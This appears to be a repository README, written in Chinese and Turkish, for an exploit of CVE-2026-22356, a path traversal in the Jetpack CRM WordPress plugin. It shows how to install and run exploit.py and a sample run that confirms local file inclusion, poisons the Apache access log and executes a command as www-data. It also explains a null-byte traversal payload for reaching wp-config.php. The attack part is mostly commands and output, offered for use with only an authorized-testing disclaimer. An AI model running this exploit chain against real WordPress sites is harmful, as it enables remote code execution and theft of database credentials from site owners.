xxconi/CVE-2026-22356

# CVE-2026-22356：Jetpack CRM 路径遍历漏洞与 RCE ## 📥 要求 ``` pip3 install requests urllib3 $ python3 exploit.py https://example.com --rce --cmd "id" [+] Target is VULNERABLE to LFI! [*] Attempting Log Poisoning for RCE... [*] Searching for accessible log files... [*] Trying: ../../../../var/log/apache2/access.log [+] Found accessible log file: ../../../../var/log/apache2/access.log [*] Poisoning log file: ../../../../var/log/apache2/access.log [+] Payload injected into log file. [*] Executing command: id [+] Command Output: uid=33(www-data) gid=33(www-data) groups=33(www-data) function jpcrm_load_admin_page( $page_name, $alt_path = ZEROBSCRM_PATH ) { $target_file = $alt_path . "admin/$page_name.page.php"; if ( file_exists( $target_file ) ) { require_once $target_file; } } Bu kodda $page_name hiçbir doğrulamadan geçmeden doğrudan kullanıldığı için saldırgan page=../../../wp-config.php%00 yollayarak require_once("admin/../../../wp-config.php%00.page.php") çağrısını tetikleyebilir. PHP, null byte'ı dosya adının sonu olarak yorumladığında wp-config.php dosyası çalıştırılır. 6.7.1 sürümünde bu kod, realpath() ve strpos() kontrolleri eklenerek düzeltilmiştir. Bu doküman, CVE-2026-22356 zafiyetini anlamanız ve yetkili testlerinizde kullanmanız için hazırlanmıştır. Yasalara aykırı kullanım tamamen kullanıcının sorumluluğundadır. ```

标签：Python, Web报告查看器, 无后门, 编程工具, 路径穿越, 远程代码执行, 逆向工具